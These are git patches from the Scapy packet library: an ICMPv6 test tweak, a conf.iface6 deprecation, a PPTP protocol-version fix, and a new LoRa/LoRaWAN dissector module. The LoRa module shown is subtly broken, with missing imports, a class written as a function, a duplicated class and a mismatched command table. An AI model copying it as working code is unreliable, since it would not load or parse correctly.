raw(IPv6()/ICMPv6MPAdv()/ICMPv6NDOptPrefixInfo()) == s = ICMPv6MPAdv - dissection (default values) p = IPv6(s) -p[ICMPv6MPAdv].type == 147 and p[ICMPv6MPAdv].cksum == 0xe8d6 and p[ICMPv6NDOptPrefixInfo].prefix == '::' +p[ICMPv6MPAdv].type == 147 and p[ICMPv6MPAdv].cksum == 0xa8d6 and p[ICMPv6NDOptPrefixInfo].prefix == '::' = ICMPv6MPAdv - build -s = b'`\x00\x00\x00\x00(:@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x93\x00(\x07\x00*@\x00\x03\x04\x00@\xff\xff\xff\xff\x00\x00\x00\x0c\x00\x00\x00\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' +s = b'`\x00\x00\x00\x00(:@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x93\x00(\x07\x00*@\x00\x03\x04@@\xff\xff\xff\xff\x00\x00\x00\x0c\x00\x00\x00\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' raw(IPv6()/ICMPv6MPAdv(cksum=0x2807, flags=1, id=42)/ICMPv6NDOptPrefixInfo(prefix='2001:db8::1', L=0, preferredlifetime=12)) == s = ICMPv6MPAdv - dissection From 81e1bd41e221dd68b05404ade37a4216eea1ac17 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 29 Mar 2020 16:37:23 +0200 Subject: [PATCH 0031/1632] Removing conf.iface6 (#2147) * Removing conf.iface6 * conf.iface6 deprecation warning --- scapy/arch/windows/__init__.py | 3 --- scapy/config.py | 4 +++- scapy/layers/dhcp6.py | 6 +++--- scapy/route6.py | 8 ++------ test/answering_machines.uts | 2 +- test/regression.uts | 2 +- 6 files changed, 10 insertions(+), 15 deletions(-) diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index 01b84f9d23e..dd14c0aba0e 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -1028,9 +1028,6 @@ def route_add_loopback(routes=None, ipv6=False, iflist=None): if isinstance(conf.iface, NetworkInterface): if conf.iface.name == scapy.consts.LOOPBACK_NAME: conf.iface = adapter - if isinstance(conf.iface6, NetworkInterface): - if conf.iface6.name == scapy.consts.LOOPBACK_NAME: - conf.iface6 = adapter conf.netcache.arp_cache["127.0.0.1"] = "ff:ff:ff:ff:ff:ff" conf.netcache.in6_neighbor["::1"] = "ff:ff:ff:ff:ff:ff" # Build the packed network addresses diff --git a/scapy/config.py b/scapy/config.py index 0fa4bb14edf..95f5c4bbe26 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -567,7 +567,6 @@ class Conf(ConfClass): interactive_shell = "" stealth = "not implemented" iface = None - iface6 = None layers = LayersList() commands = CommandsList() dot15d4_protocol = None # Used in dot15d4.py @@ -661,6 +660,9 @@ def __getattr__(self, attr): if attr == "services_tcp": from scapy.data import TCP_SERVICES return TCP_SERVICES + if attr == "iface6": + warning("conf.iface6 is deprecated in favor of conf.iface") + attr = "iface" return object.__getattribute__(self, attr) diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index 4dc3257ba65..2690e9299c3 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -1363,7 +1363,7 @@ class DHCPv6_am(AnsweringMachine): def usage(self): msg = """ DHCPv6_am.parse_options( dns="2001:500::1035", domain="localdomain, local", - duid=None, iface=conf.iface6, advpref=255, sntpservers=None, + duid=None, iface=conf.iface, advpref=255, sntpservers=None, sipdomains=None, sipservers=None, nisdomain=None, nisservers=None, nispdomain=None, nispservers=None, @@ -1377,7 +1377,7 @@ def usage(self): answering machine. iface : the interface to listen/reply on if you do not want to use - conf.iface6. + conf.iface. advpref : Value in [0,255] given to Advertise preference field. By default, 255 is used. Be aware that this specific @@ -1446,7 +1446,7 @@ def norm_list(val, param_name): return -1 if iface is None: - iface = conf.iface6 + iface = conf.iface self.debug = debug diff --git a/scapy/route6.py b/scapy/route6.py index 3365bc0c66a..2508e411655 100644 --- a/scapy/route6.py +++ b/scapy/route6.py @@ -308,7 +308,7 @@ def route(self, dst=None, dev=None, verbose=conf.verb): # - dst is unicast global. Check if it is 6to4 and we have a source # 6to4 address in those available # - dst is link local (unicast or multicast) and multiple output - # interfaces are available. Take main one (conf.iface6) + # interfaces are available. Take main one (conf.iface) # - if none of the previous or ambiguity persists, be lazy and keep # first one @@ -320,7 +320,7 @@ def route(self, dst=None, dev=None, verbose=conf.verb): tmp = [x for x in res if in6_isaddr6to4(x[2][1])] elif in6_ismaddr(dst) or in6_islladdr(dst): # TODO : I'm sure we are not covering all addresses. Check that - tmp = [x for x in res if x[2][0] == conf.iface6] + tmp = [x for x in res if x[2][0] == conf.iface] if tmp: res = tmp @@ -335,7 +335,3 @@ def route(self, dst=None, dev=None, verbose=conf.verb): conf.route6 = Route6() -try: - conf.iface6 = conf.route6.route(None)[0] -except Exception: - pass diff --git a/test/answering_machines.uts b/test/answering_machines.uts index bdc69e47f77..e81654daa96 100644 --- a/test/answering_machines.uts +++ b/test/answering_machines.uts @@ -66,7 +66,7 @@ a = DHCPv6_am() a.usage() a.parse_options(dns="2001:500::1035", domain="localdomain, local", duid=None, - iface=conf.iface6, advpref=255, sntpservers=None, + iface=conf.iface, advpref=255, sntpservers=None, sipdomains=None, sipservers=None, nisdomain=None, nisservers=None, nispdomain=None, nispservers=None, diff --git a/test/regression.uts b/test/regression.uts index f163309ed04..0659d3fd50f 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -185,7 +185,7 @@ get_if_list() get_working_if() -get_if_raw_addr6(conf.iface6) +get_if_raw_addr6(conf.iface) = Test read_routes6() - default output From 8e608df8dd17b5690f5bb0c47fa309ddb0489438 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 29 Mar 2020 20:57:39 +0000 Subject: [PATCH 0032/1632] Better default protocol version PPTP --- scapy/layers/pptp.py | 4 ++-- test/pptp.uts | 8 ++++---- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/scapy/layers/pptp.py b/scapy/layers/pptp.py index c43959ec177..eabb19c259e 100644 --- a/scapy/layers/pptp.py +++ b/scapy/layers/pptp.py @@ -88,7 +88,7 @@ class PPTPStartControlConnectionRequest(PPTP): XIntField("magic_cookie", _PPTP_MAGIC_COOKIE), ShortEnumField("ctrl_msg_type", 1, _PPTP_ctrl_msg_type), XShortField("reserved_0", 0x0000), - ShortField("protocol_version", 1), + ShortField("protocol_version", 0x0100), XShortField("reserved_1", 0x0000), FlagsField("framing_capabilities", 0, 32, _PPTP_FRAMING_CAPABILITIES_FLAGS), @@ -114,7 +114,7 @@ class PPTPStartControlConnectionReply(PPTP): XIntField("magic_cookie", _PPTP_MAGIC_COOKIE), ShortEnumField("ctrl_msg_type", 2, _PPTP_ctrl_msg_type), XShortField("reserved_0", 0x0000), - ShortField("protocol_version", 1), + ShortField("protocol_version", 0x0100), ByteEnumField("result_code", 1, _PPTP_start_control_connection_result), ByteEnumField("error_code", 0, _PPTP_general_error_code), diff --git a/test/pptp.uts b/test/pptp.uts index 2861d2e17c5..9eebecc6377 100644 --- a/test/pptp.uts +++ b/test/pptp.uts @@ -472,7 +472,7 @@ start_control_connection = PPTPStartControlConnectionRequest(framing_capabilitie firmware_revision=47, host_name='test host name', vendor_string='test vendor string') -start_control_connection_ref_data = hex_bytes('009c00011a2b3c4d00010000000100000000000100000002002a00'\ +start_control_connection_ref_data = hex_bytes('009c00011a2b3c4d00010000010000000000000100000002002a00'\ '2f7465737420686f7374206e616d65000000000000000000000000'\ '000000000000000000000000000000000000000000000000000000'\ '0000000000000000000000746573742076656e646f722073747269'\ @@ -485,7 +485,7 @@ start_control_connection_pkt = PPTP(start_control_connection_ref_data) assert isinstance(start_control_connection_pkt, PPTPStartControlConnectionRequest) assert start_control_connection_pkt.magic_cookie == 0x1a2b3c4d -assert start_control_connection_pkt.protocol_version == 1 +assert start_control_connection_pkt.protocol_version == 0x0100 assert start_control_connection_pkt.framing_capabilities == 1 assert start_control_connection_pkt.bearer_capabilities == 2 assert start_control_connection_pkt.maximum_channels == 42 @@ -500,7 +500,7 @@ start_control_connection_reply = PPTPStartControlConnectionReply(result_code='Ge framing_capabilities='Synchronous Framing supported', bearer_capabilities='Analog access supported', vendor_string='vendor') -start_control_connection_reply_ref_data = hex_bytes('009c00011a2b3c4d00020000000102010000000200000001ffff0'\ +start_control_connection_reply_ref_data = hex_bytes('009c00011a2b3c4d00020000010002010000000200000001ffff0'\ '1006c696e75780000000000000000000000000000000000000000'\ '00000000000000000000000000000000000000000000000000000'\ '000000000000000000000000076656e646f720000000000000000'\ @@ -513,7 +513,7 @@ start_control_connection_reply_pkt = PPTP(start_control_connection_reply_ref_dat assert isinstance(start_control_connection_reply_pkt, PPTPStartControlConnectionReply) assert start_control_connection_reply_pkt.magic_cookie == 0x1a2b3c4d -assert start_control_connection_reply_pkt.protocol_version == 1 +assert start_control_connection_reply_pkt.protocol_version == 0x0100 assert start_control_connection_reply_pkt.result_code == 2 assert start_control_connection_reply_pkt.error_code == 1 assert start_control_connection_reply_pkt.framing_capabilities == 2 From 0e2b930a4dc1120bf56d1b75dce6cf9c3e9bf1c8 Mon Sep 17 00:00:00 2001 From: FlUxIuS Date: Sat, 22 Feb 2020 21:13:10 +0100 Subject: [PATCH 0033/1632] Adding LoRa PHY and LoRaWAN 1.0 + 1.1 layers --- scapy/contrib/loraphy2wan.py | 692 +++++++++++++++++++++++++++++++++++ test/contrib/loraphy2wan.uts | 23 ++ 2 files changed, 715 insertions(+) create mode 100644 scapy/contrib/loraphy2wan.py create mode 100644 test/contrib/loraphy2wan.uts diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py new file mode 100644 index 00000000000..7eee9f7cadc --- /dev/null +++ b/scapy/contrib/loraphy2wan.py @@ -0,0 +1,692 @@ +# This file is part of Scapy +# Scapy is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 2 of the License, or +# any later version. +# +# Scapy is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with Scapy. If not, see . + +# scapy.contrib.description = LoRa PHY to WAN Layer +# scapy.contrib.status = loads + + +""" + Copyright (C) 2020 Sebastien Dudek (@FlUxIuS @PentHertz) +""" + +from __future__ import absolute_import + +from scapy.fields import BitField, ByteEnumField, ByteField, \ + ConditionalField, EnumField, FieldLenField, IntField, LEIntField, \ + LELongField, LEShortField, MACField, PacketListField, ShortField, \ + StrFixedLenField, StrLenField, X3BytesField, XByteField, XIntField, \ + XLongField, XShortField, LEShortEnumField + +############################################################################### +# Followed Specifications # +############################################################################### +# LoRa 1.0.x: https://lora-alliance.org/sites/default/files/2018-07/ # +#lorawan1.0.3.pdf # +# LoRa 1.1.x: https://lora-alliance.org/sites/default/files/2018-04/ # +#lorawantm_specification_-v1.1.pdf # +############################################################################### + +class FCtrl_DownLink(Packet): + name = "FCtrl_DownLink" + fields_desc = [BitField("ADR", 0, 1), + BitField("ADRACKReq", 0, 1), + BitField("ACK", 0, 1), + BitField("FPending", 0, 1), + BitFieldLenField("FOptsLen", 0, 4)] + + def extract_padding(self, p): + return "", p + + +class FCtrl_UpLink(Packet): + name = "FCtrl_UpLink" + fields_desc = [BitField("ADR", 0, 1), + BitField("ADRACKReq", 0, 1), + BitField("ACK", 0, 1), + BitField("ClassB", 0, 1), + BitFieldLenField("FOptsLen", 0, 4)] + + def extract_padding(self, p): + return "", p + + +class DevAddrElem(Packet): + name = "DevAddrElem" + fields_desc = [XByteField("NwkID", 0x0), + LEX3BytesField("NwkAddr", b"\x00"*3)] + + def extract_padding(self, p): + return "", p + + +CIDs_up = {0x01: "ResetInd", + 0x02: "LinkCheckReq", + 0x03: "LinkADRReq", + 0x04: "DutyCycleReq", + 0x05: "RXParamSetupReq", + 0x06: "DevStatusReq", + 0x07: "NewChannelReq", + 0x08: "RXTimingSetupReq", + 0x09: "TxParamSetupReq", # LoRa 1.1 specs from here + 0x0A: "DlChannelReq", + 0x0B: "RekeyInd", + 0x0C: "ADRParamSetupReq", + 0x0D: "DeviceTimeReq", + 0x0E: "ForceRejoinReq", + 0x0F: "RejoinParamSetupReq"} # end of LoRa 1.1 specs + + +CIDs_down = {0x01: "ResetConf", + 0x02: "LinkCheckAns", + 0x03: "LinkADRAns", + 0x04: "DutyCycleAns", + 0x05: "RXParamSetupAns", + 0x06: "DevStatusAns", + 0x07: "NewChannelAns", + 0x08: "RXTimingSetupAns", + 0x09: "TxParamSetupAns", # LoRa 1.1 specs from here + 0x0A: "DlChannelAns", + 0x0B: "RekeyConf", + 0x0C: "ADRParamSetupAns", + 0x0D: "DeviceTimeAns", + 0x0F: "RejoinParamSetupAns"} # end of LoRa 1.1 specs + + +class ResetInd(Packet): + name = "ResetInd" + fields_desc = [ByteField("Dev_version", 0)] + + +class ResetConf(Packet): + name = "ResetConf" + fields_desc = [ByteField("Serv_version", 0)] + + +class LinkCheckReq(Packet): + name = "LinkCheckReq" + fields_desc = [] + + +class LinkCheckAns(Packet): + name = "LinkCheckAns" + fields_desc = [ByteField("Margin", 0), + ByteField("GwCnt", 0)] + + +class DataRate_TXPower(Packet): + name = "DataRate_TXPower" + fields_desc = [XBitField("DataRate", 0, 4), + XBitField("TXPower", 0, 4)] + + +class Redundancy(Packet): + name = "Redundancy" + fields_desc = [XBitField("RFU", 0, 1), + XBitField("ChMaskCntl", 0, 3), + XBitField("NbTrans", 0, 4)] + + +class LinkADRReq(Packet): + name = "LinkADRReq" + fields_desc = [DataRate_TXPower, + XShortField("ChMask", 0), + Redundancy] + + +class LinkADRAns_Status(Packet): + name = "LinkADRAns_Status" + fields_desc = [BitField("RFU", 0, 5), + BitField("PowerACK", 0, 1), + BitField("ChannelMaskACK", 0, 1)] + + +class LinkADRAns(Packet): + name = "LinkADRAns" + fields_desc = [LinkADRAns_Status] + + +class DutyCyclePL(Packet): + name = "DutyCyclePL" + fields_desc = [BitField("MaxDCycle", 0, 4)] + + +class DutyCycleReq(Packet): + name = "DutyCycleReq" + fields_desc = [DutyCyclePL] + + +class DutyCycleAns(Packet): + name = "DutyCycleAns" + fields_desc = [] + + +class DLsettings(Packet): + name = "DLsettings" + fields_desc = [BitField("RFU", 0, 1), + BitField("RX1DRoffset", 0, 3), + BitField("RX2DataRate", 0, 4)] + + +class RXParamSetupReq(Packet): + name = "RXParamSetupReq" + fields_desc = [DLsettings, + X3BytesField("Frequency", 0)] + + +class RXParamSetupAns_Status(Packet): + name = "RXParamSetupAns_Status" + fields_desc = [XBitField("RFU", 0, 5), + BitField("RX1DRoffsetACK", 0, 1), + BitField("RX2DatarateACK", 0, 1), + BitField("ChannelACK", 0, 1)] + + +class RXParamSetupAns(Packet): + name = "RXParamSetupAns" + fields_desc = [RXParamSetupAns_Status] + +Battery_state = {0: "End-device connected to external source", + 255: "Battery level unknown"} + + +class DevStatusReq(Packet): + name = "DevStatusReq" + fields_desc = [ByteEnumField("Battery", 0, Battery_state), + ByteField("Margin", 0)] + + +class DevStatusAns_Status(Packet): + name = "DevStatusAns_Status" + fields_desc = [XBitField("RFU", 0, 2), + XBitField("Margin", 0, 6)] + + +class DevStatusAns(Packet): + name = "DevStatusAns" + fields_desc = [DevStatusAns_Status] + + +class DrRange(Packet): + name = "DrRange" + fields_desc = [XBitField("MaxDR", 0, 4), + XBitField("MinDR", 0, 4)] + + +class NewChannelReq(Packet): + name = "NewChannelReq" + fields_desc = [ByteField("ChIndex", 0), + X3BytesField("Freq", 0), + DrRange] + + +class NewChannelAns_Status(Packet): + name = "NewChannelAns_Status" + fields_desc = [XBitField("RFU", 0, 6), + BitField("Dataraterangeok", 0, 1), + BitField("Channelfrequencyok", 0, 1)] + + +class NewChannelAns(Packet): + name = "NewChannelAns" + fields_desc = [NewChannelAns_Status] + + +class RXTimingSetupReq_Settings(Packet): + name = "RXTimingSetupReq_Settings" + fields_desc = [XBitField("RFU", 0, 4), + XBitField("Del", 0, 4)] + + +class RXTimingSetupReq(Packet): + name = "RXTimingSetupReq" + fields_desc = [RXTimingSetupReq_Settings] + + +class RXTimingSetupAns(Packet): + name = "RXTimingSetupAns" + fields_desc = [] + + +# Specific commands for LoRa 1.1 here + + +MaxEIRPs = {0: "8 dbm", + 1: "10 dbm", + 2: "12 dbm", + 3: "13 dbm", + 4: "14 dbm", + 5: "16 dbm", + 6: "18 dbm", + 7: "20 dbm", + 8: "21 dbm", + 9: "24 dbm", + 10: "26 dbm", + 11: "27 dbm", + 12: "29 dbm", + 13: "30 dbm", + 14: "33 dbm", + 15: "36 dbm"} + + +DwellTimes = {0: "No limit", + 1: "400 ms"} + + +class EIRP_DwellTime(Packet): + name = "EIRP_DwellTime" + fields_desc = [BitField("RFU", 0b0, 2), + BitEnumField("DownlinkDwellTime", 0b0, 1, DwellTimes), + BitEnumField("UplinkDwellTime", 0b0, 1, DwellTimes), + BitEnumField("MaxEIRP", 0b0000, 4, MaxEIRPs)] + + +class TxParamSetupReq(Packet): + name = "TxParamSetupReq" + fields_desc = [EIRP_DwellTime] + + +class TxParamSetupAns(Packet): + name = "TxParamSetupAns" + fields_desc = [] + + +class DlChannelReq(Packet): + name = "DlChannelReq" + fields_desc = [ByteField("ChIndex", 0), + X3BytesField("Freq", 0)] + + +class DlChannelAns(Packet): + name = "DlChannelAns" + fields_desc = [ByteField("Status", 0)] + + +class DevLoraWANversion(Packet): + name = "DevLoraWANversion" + fields_desc = [BitField("RFU", 0b0000, 4), + BitField("Minor", 0b0001, 4)] + + +class RekeyInd(Packet): + name = "RekeyInd" + fields_desc = [PacketListField("LoRaWANversion", b"", + DevLoraWANversion, length_from=lambda pkt:1)] + + +class RekeyConf(Packet): + name = "RekeyConf" + fields_desc = [ByteField("ServerVersion", 0)] + + +class ADRparam(Packet): + name = "ADRparam" + fields_desc = [BitField("Limit_exp", 0b0000, 4), + BitField("Delay_exp", 0b0000, 4)] + + +class ADRParamSetupReq(Packet): + name = "ADRParamSetupReq" + fields_desc = [ADRparam] + + +class ADRParamSetupAns(Packet): + name = "ADRParamSetupReq" + fields_desc = [] + + +class DeviceTimeReq(Packet): + name = "DeviceTimeReq" + fields_desc = [] + + +class DeviceTimeAns(Packet): + name = "DeviceTimeAns" + fields_desc = [IntField("SecondsSinceEpoch", 0), + ByteField("FracSecond", 0x00)] + + +class ForceRejoinReq(Packet): + name ="ForceRejoinReq" + fields_desc = [BitField("RFU", 0, 2), + BitField("Period", 0, 3), + BitField("Max_Retries", 0, 3), + BitField("RFU", 0, 1), + BitField("RejoinType", 0, 3), + BitField("DR", 0, 4)] + + +class RejoinParamSetupReq(Packet): + name = "RejoinParamSetupReq" + fields_desc = [BitField("MaxTimeN", 0, 4), + BitField("MaxCountN", 0, 4)] + + +class RejoinParamSetupAns(Packet): + name = "RejoinParamSetupAns" + fields_desc = [BitField("RFU", 0, 7), + BitField("TimeOK", 0, 1)] + + +# End of specific 1.1 commands + + +class MACCommand_up(Packet): + name = "MACCommand_up" + fields_desc = [ByteEnumField("CID", 0, CIDs_up), + ConditionalField(PacketListField("Reset", b"", + ResetInd, + length_from=lambda pkt:1), + lambda pkt:(pkt.CID == 0x01)), + ConditionalField(PacketListField("LinkCheck", b"", + LinkCheckReq, + length_from=lambda pkt:0), + lambda pkt:(pkt.CID == 0x02)), + ConditionalField(PacketListField("LinkADR", b"", + LinkADRReq, + length_from=lambda pkt:4), + lambda pkt:(pkt.CID == 0x03)), + ConditionalField(PacketListField("DutyCycle", b"", + DutyCycleReq, + length_from=lambda pkt:4), + lambda pkt:(pkt.CID == 0x04)), + ConditionalField(PacketListField("RXParamSetup", b"", + RXParamSetupReq, + length_from=lambda pkt:4), + lambda pkt:(pkt.CID == 0x05)), + ConditionalField(PacketListField("DevStatus", b"", + DevStatusReq, + length_from=lambda pkt:2), + lambda pkt:(pkt.CID == 0x06)), + ConditionalField(PacketListField("NewChannel", b"", + NewChannelReq, + length_from=lambda pkt:5), + lambda pkt:(pkt.CID == 0x07)), + ConditionalField(PacketListField("RXTimingSetup", b"", + RXTimingSetupReq, + length_from=lambda pkt:1), + lambda pkt:(pkt.CID == 0x08)), + ConditionalField(PacketListField("TxParamSetup", b"", # specific to 1.1 from here + TxParamSetupReq, + length_from=lambda pkt:1), + lambda pkt:(pkt.CID == 0x09)), + ConditionalField(PacketListField("DlChannel", b"", + DlChannelReq, + length_from=lambda pkt:4), + lambda pkt:(pkt.CID == 0x0A)), + ConditionalField(PacketListField("Rekey", b"", + RekeyInd, + length_from=lambda pkt:1), + lambda pkt:(pkt.CID == 0x0B)), + ConditionalField(PacketListField("ADRParamSetup", b"", + ADRParamSetupReq, + length_from=lambda pkt:1), + lambda pkt:(pkt.CID == 0x0C)), + ConditionalField(PacketListField("DeviceTime", b"", + DeviceTimeReq, + length_from=lambda pkt:0), + lambda pkt:(pkt.CID == 0x0D)), + ConditionalField(PacketListField("ForceRejoin", b"", + ForceRejoinReq, + length_from=lambda pkt:2), + lambda pkt:(pkt.CID == 0x0E)), + ConditionalField(PacketListField("RejoinParamSetup", b"", + RejoinParamSetupReq, + length_from=lambda pkt:1), + lambda pkt:(pkt.CID == 0x0F))] + + def extract_padding(self, p): + return "", p + + +class MACCommand_down(Packet): + name = "MACCommand_down" + fields_desc = [ByteEnumField("CID", 0, CIDs_up), + ConditionalField(PacketListField("Reset", b"", + ResetConf, + length_from=lambda pkt:1), + lambda pkt:(pkt.CID == 0x01)), + ConditionalField(PacketListField("LinkCheck", b"", + LinkCheckAns, + length_from=lambda pkt:2), + lambda pkt:(pkt.CID == 0x02)), + ConditionalField(PacketListField("LinkADR", b"", + LinkADRAns, + length_from=lambda pkt:0), + lambda pkt:(pkt.CID == 0x03)), + ConditionalField(PacketListField("DutyCycle", b"", + DutyCycleAns, + length_from=lambda pkt:4), + lambda pkt:(pkt.CID == 0x04)), + ConditionalField(PacketListField("RXParamSetup", b"", + RXParamSetupAns, + length_from=lambda pkt:1), + lambda pkt:(pkt.CID == 0x05)), + ConditionalField(PacketListField("DevStatusAns", b"", + RXParamSetupAns, + length_from=lambda pkt:1), + lambda pkt:(pkt.CID == 0x06)), + ConditionalField(PacketListField("NewChannel", b"", + NewChannelAns, + length_from=lambda pkt:1), + lambda pkt:(pkt.CID == 0x07)), + ConditionalField(PacketListField("RXTimingSetup", b"", + RXTimingSetupAns, + length_from=lambda pkt:0), + lambda pkt:(pkt.CID == 0x08)), + ConditionalField(PacketListField("TxParamSetup", b"", + TxParamSetupAns, + length_from=lambda pkt:0), + lambda pkt:(pkt.CID == 0x09)), + ConditionalField(PacketListField("DlChannel", b"", + DlChannelAns, + length_from=lambda pkt:1), + lambda pkt:(pkt.CID == 0x0A)), + ConditionalField(PacketListField("Rekey", b"", + RekeyConf, + length_from=lambda pkt:1), + lambda pkt:(pkt.CID == 0x0B)), + ConditionalField(PacketListField("ADRParamSetup", b"", + ADRParamSetupAns, + length_from=lambda pkt:0), + lambda pkt:(pkt.CID == 0x0C)), + ConditionalField(PacketListField("DeviceTime", b"", + DeviceTimeAns, + length_from=lambda pkt:5), + lambda pkt:(pkt.CID == 0x0D)), + ConditionalField(PacketListField("RejoinParamSetup", b"", + RejoinParamSetupAns, + length_from=lambda pkt:1), + lambda pkt:(pkt.CID == 0x0F))] + + def extract_padding(self, p): + return "", p + + +class FOpts(Packet): + name = "FOpts" + fields_desc = [ConditionalField(PacketListField("FOpts_up", b"", + MACCommand_up, # piggybacked MAC Command for uplink + length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), + lambda pkt:(pkt.FCtrl[0].FOptsLen > 0 + and pkt.MType & 0b1 == 0 + and pkt.MType >= 0b010)), + ConditionalField(PacketListField("FOpts_down", b"", + MACCommand_down, # piggybacked MAC Command for downlink + length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), + lambda pkt:(pkt.FCtrl[0].FOptsLen > 0 + and pkt.MType & 0b1 == 1 + and pkt.MType <= 0b101))] + + +def FOptsShow(pkt): + try: + if pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 0 and pkt.MType >= 0b010: + return True + elif pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 1 and pkt.MType <= 0b101: + return True + return False + except: + return False + + +class FHDR(Packet): + name = "FHDR" + fields_desc = [ConditionalField(PacketListField("DevAddr", b"", DevAddrElem, + length_from=lambda pkt:4), + lambda pkt:(pkt.MType >= 0b010 + and pkt.MType <= 0b101)), + ConditionalField(PacketListField("FCtrl", b"", + FCtrl_DownLink, + length_from=lambda pkt:1), + lambda pkt:(pkt.MType & 0b1 == 1 + and pkt.MType <= 0b101)), + ConditionalField(PacketListField("FCtrl", b"", + FCtrl_UpLink, + length_from=lambda pkt:1), + lambda pkt:(pkt.MType & 0b1 == 0 + and pkt.MType >= 0b010)), + ConditionalField(LEShortField("FCnt", 0), + lambda pkt:(pkt.MType >= 0b010 + and pkt.MType <= 0b101)), + ConditionalField(PacketListField("FOpts_up", b"", + MACCommand_up, + length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), + lambda pkt:FOptsShow(pkt)), + ConditionalField(PacketListField("FOpts_down", b"", + MACCommand_down, + length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), + lambda pkt:FOptsShow(pkt))] + + +FPorts = {0: "NwkSKey"} # anything else is AppSKey + + +JoinReqTypes = {0xFF: "Join-request", + 0x00: "Rejoin-request type 0", + 0x01: "Rejoin-request type 1", + 0x02: "Rejoin-request type 2"} + + +class Join_Request(Packet): + name = "Join_Request" + fields_desc = [StrFixedLenField("AppEUI", b"\x00" * 8, 8), + StrFixedLenField("DevEUI", b"\00" * 8, 8), + LEShortField("DevNonce", 0x0000)] + + +class DLsettings(Packet): + name = "DLsettings" + fields_desc = [BitField("OptNeg", 0, 1), + XBitField("RX1DRoffset", 0, 3), + XBitField("RX2_Data_rate", 0, 4)] + + +class Join_Accept(Packet): + name = "Join_Accept" + dcflist = False + fields_desc = [LEX3BytesField("JoinAppNonce", 0), + LEX3BytesField("NetID", 0), + XLEIntField("DevAddr", 0), + DLsettings, + XByteField("RxDelay", 0), + ConditionalField(StrFixedLenField("CFList", b"\x00" * 16 , 16), + lambda pkt:(Join_Accept.dcflist is True))] + + def extract_padding(self, p): + return "", p + + def __init__(self, packet=""): # CFlist calculated with on rest packet len + if len(packet) > 18: + Join_Accept.dcflist = True + return super(Join_Accept, self).__init__(packet) + + +RejoinType = {0: "NetID+DevEUI", + 1: "JoinEUI+DevEUI", + 2: "NetID+DevEUI"} + + +def RejoinReq(Packet): # LoRa 1.1 specs + name = "RejoinReq" + fields_desc = [ByteField("Type", 0), + X3BytesField("NetID", 0), + StrFixedLenField("DevEUI", b"\x00" * 8), + XShortField("RJcount0", 0)] + + +class FRMPayload(Packet): + name = "FRMPayload" + fields_desc = [ConditionalField(StrField("DataPayload", 0, remain=4), # Downlink + lambda pkt:(pkt.MType == 0b101 + or pkt.MType == 0b011)), + ConditionalField(StrField("DataPayload", 0, remain=6), # Uplink + lambda pkt:(pkt.MType == 0b100 + or pkt.MType == 0b010)), + ConditionalField(PacketListField("Join_Request_Field", b"", + Join_Request, + length_from=lambda pkt:18), + lambda pkt:(pkt.MType == 0b000)), + ConditionalField(PacketListField("Join_Accept_Field", b"", + Join_Accept, + count_from=lambda pkt:1), + lambda pkt:(pkt.MType == 0b001 + and LoRa.encrypted is False)), + ConditionalField(StrField("Join_Accept_Encrypted", 0), + lambda pkt:(pkt.MType == 0b001 and LoRa.encrypted is True))] + + +class MACPayload(Packet): + name = "MACPayload" + fields_desc = [FHDR, + ConditionalField(ByteEnumField("FPort", 0, FPorts), + lambda pkt:(pkt.MType >= 0b010 and pkt.MType <= 0b101)), + FRMPayload] + + +MTypes = {0b000: "Join-request", + 0b001: "Join-accept", + 0b010: "Unconfirmed Data Up", + 0b011: "Unconfirmed Data Down", + 0b100: "Confirmed Data Up", + 0b101: "Confirmed Data Down", + 0b110: "Rejoin-request", # Only in LoRa 1.1 specs + 0b111: "Proprietary"} + + +class MHDR(Packet): # same for 1.0 and 1.1 + name = "MHDR" + fields_desc = [BitEnumField("MType", 0b000, 3, MTypes), + BitField("RFU", 0b000, 3), + BitField("Major", 0b00, 2)] + + +class PHYPayload(Packet): + name = "PHYPayload" + fields_desc = [MHDR, + MACPayload, + ConditionalField(XIntField("MIC", 0), + lambda pkt:(pkt.MType != 0b001 + or LoRa.encrypted is False))] + + +class LoRa(Packet): # default frame (unclear specs => taken from https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5677147/) + name = "LoRa" + version = "1.1" # default version to parse + encrypted = True + fields_desc = [XBitField("Preamble", 0, 4), + XBitField("PHDR", 0, 16), + XBitField("PHDR_CRC", 0, 4), + PHYPayload, + ConditionalField(XShortField("CRC", 0), + lambda pkt:(pkt.MType & 0b1 == 0))] diff --git a/test/contrib/loraphy2wan.uts b/test/contrib/loraphy2wan.uts new file mode 100644 index 00000000000..9402e0e4f86 --- /dev/null +++ b/test/contrib/loraphy2wan.uts @@ -0,0 +1,23 @@ +% Regression tests for Scapy + ++Syntax check += Import the loraphy2wan layer + +from scapy.contrib.loraphy2wan import * +#from scapy.all import 